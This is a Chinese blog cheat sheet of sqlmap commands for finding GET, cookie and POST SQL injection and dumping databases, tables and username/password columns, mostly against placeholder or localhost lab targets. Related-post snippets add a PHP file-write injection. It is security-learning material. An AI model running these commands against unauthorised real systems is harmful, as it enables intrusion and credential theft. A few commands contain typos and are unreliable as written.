sqlmap的注入使用常用命令

最新推荐文章于 2024-07-11 18:55:16 发布
最新推荐文章于 2024-07-11 18:55:16 发布
阅读量466 收藏 2
点赞数
文章标签: mysql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43560176/article/details/107160092
版权

SQLmap的注入使用

sqlmap的注入使用常用命令

SQLmap是一款强大的注入工具,相比经典的啊D和明小子之类的注入工具,SQLmap功能更加强大,无论是自带字典,功能还是界面优化,都是一款非常不错的注入工具,sqlmap可以多平台 运行,windows,linux下都可以进行access,mysql,mssql等数据库的注入 ,更重要的是sqlmap是一款开源的工具

注入命令详解:

找到sqlmap路径,在CMD里面输入CD CC路径进入到SQLMAP路径目录下,然后输入python sqlmap.py -u"xxxxxxxxx"

sqlmap语句含义:
三种注入判断方式:

  1. python sqlmap.py -u “xxxxxx.com” [查询链接是否存在get注入漏洞以及返现目标基本信息]
  2. python sqlmap.py -u “xxxxxx.com” --cookie “id=xx” --level 2 [判断url是否存在cookie注入]
  3. python sqlmap.py -u “xxxxxx.com” --data “xx=xx&xx=xx” [判断url是否存在post注入]

get注入详解

python sqlmap.py -u “xxxxxx.com” --dbs [获取数据库内所有数据库名称]
python sqlmap.py -u “xxxxxx.com” --current-db [查看目标网站所存在的数据库名称]
python sqlmap.py -u “xxxxxx.com” -D XX --tables [获取XX数据库内的表信息]
python sqlmap.py -u “xxxxxx.com” D XX [数据库名] -T XX [表名] --columns [获取表内列的信息]
python sqlmap.py -u “xxxxxx.com” D XX -T XX -C XX,XX[列名] --dump [获取列内信息]

cookie注入详解

sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie “id=27” --level 2 //判断是否村内在cookie注入
sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie “id=27” --level 2 --tables//猜解admin表下的列名
sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie “id=27” --level 2 --dump -C “usename,password” -T admin//获取指定列名admin下的数据

post注入详解

sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” //判断注入
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” --tables//猜解表明
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” --tables -D “security”//猜解security数据库下的表名
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” --columns -T “user” //猜解security数据库下的表名user中的列名
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” --dump -C “isername,password” -T user //猜解数据

SanTim
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLmap常用命令
05-08
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,当然对于真实环境中这爆破功能战斗力基本为0....
SQLMAP神器使用.pdf
01-05
3. **常用命令**: - `-r`:读取POST请求数据。 - `-p`:指定注入参数。 - `--level`:设置执行测试的等级,1-5,默认1,等级越高,测试越全面。 - `--risk`:设置执行测试的风险等级,0-3,默认1,风险越大,...
sqlmap注入常用命令
智三岁的博客
02-22 1122
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项 目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. "http://www.site.com/vuln.php?id=1") -g GOOGLEDORK ...
sqlmap使用之-post注入、head注入(ua、cookie、referer)
最新发布
weixin_51520483的博客
07-11 457
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
sqlmap注入教程 常用指令
qq_58000413的博客
06-29 1888
sqlmap一些指令
sqlmap注入命令大全
m0_63028223的博客
04-17 2963
sqlmap -u "注入点地址" --dbs数据库 "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla --tables 打开数据库中的 ”joomla表格 sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fiel...
sql注入之——SQLMap常见语句
温柔小薛的博客
07-19 3787
填坑~~ SQLMap常见语句 首先要明确 整个的单词 需要用两个横杠– 缩写的单词 需要一个横杠- 参考:https://www.freebuf.com/sectool/164608.html 一、个人常用语句总结: 1、最常用URL注入语句 sqlmap.py -u http://192.168.0.102/sqlserver/1.aspx?xxser=1 –level=LEVEL 执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数
SQLMAP使用笔记.pdf
01-25
下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、...
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
### SQLmap注入获取Webshell及系统权限研究 #### 概述 在网络安全领域,SQL注入是一种常见的攻击方式,被黑客用来获取对目标系统的未授权访问。`SQLmap`是一款开源工具,专门用于自动化地发现并利用SQL注入漏洞,...
sqlmap常用语句
08-14
sqlmap正是为此设计的一款强大工具,它能够自动探测并利用SQL注入漏洞,提取数据、控制数据库服务器或对操作系统执行命令。 ### sqlmap基础知识 #### 1. 获取当前用户 `sqlmap.pysqlmap-u...
sql注入语句及sqlmap常用语句
weixin_45380141的博客
12-01 132
sqlmap命令大全
02-22
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令
sqlmap常用命令使用方法
A_Alger的博客
07-23 877
-d DIRECT 直接连接数据库的连接字符串 -u 目标url -I 日志文件 从burp或者webScarab代理日志文件中分析目标 -x 网站地图URL 从远程网站地图(sitemap.xml)文件来解析目标 -m 文件 将目标地址保存在文件中,一行一个url地址进行批量检测 -r 请求文件 -c 配置文件 从配置ini文件中加载选项 -o 打开所有的优化开关 -p...
SQLmap工具常用命令
大学霸__IT达人
07-04 138
SQLmap工具常用命令 SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具。它有一个非常棒的特性,即对检测与利用进行自动化处理,如获取数据库指纹、访问底层文件系统、执行命令等等。 ...
sqlmap运行mysql命令_注入神器sqlmap使用详解
weixin_29018815的博客
02-11 628
说明本文主要讲一下sqlmap在实战中的一些技巧注入检测检测注入sqlmap.py -u http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 --batch参数“–batch”命令来自动答复y或n。批量检测sqlmap.py-m url.txt常用注入方法1.ACCESS数据库注入sqlmap.py -u “url” /*-u为常规描参数*...
Sqlmap常用命令总结及注入实战(Access、mysql
热门推荐
OKAY_TC的博客
11-19 5万+
sqlmap常用命令总结: 注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行) 1#、注入六连: 1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点 2. --dbs 【检测站点包含哪些数据库 3. --current-db 【获取当前的数据库...
【SQL注入Sqlmap使用指南(手把手保姆版)持续更新
开水的博客
03-15 2万+
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
sqlmap命令大全(附详细描流程)
m0_50818626的博客
05-24 7583
3.描指定数据库中的所有表名,-D可以指定要描的数据库,这里我的是security库。红框内就是我们所描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.描users中的字段名是什么,-T可以指定描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被描出来了。5.用dump描出字段中的所有数据。2.描所有数据库 -dbs。
SQL注入之堆叠注入
Devil_ping的博客
02-10 905
堆叠注入又叫多语句注入,就是原本只执行一个sql句,用函数让他可以执行多个sql语句 mysqli_query这个函数 只能执行一个sql语句 mysqli_multi_query这个函数 支持执行多个sql语句 例如select 1,2,3;select 4,5,6 ?id=1' ; select"<?php phpinfo();?>"into outfile"...
sqlmap常用命令
12-07
以下是sqlmap的几个常用命令: 1. 基本命令:`python sqlmap.py -u <目标URL> --dbs`,用于描目标URL的数据库。 2. 指定cookie进行描:`python sqlmap.py -u <目标URL> --cookie="内容>" --dbs`,用于使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值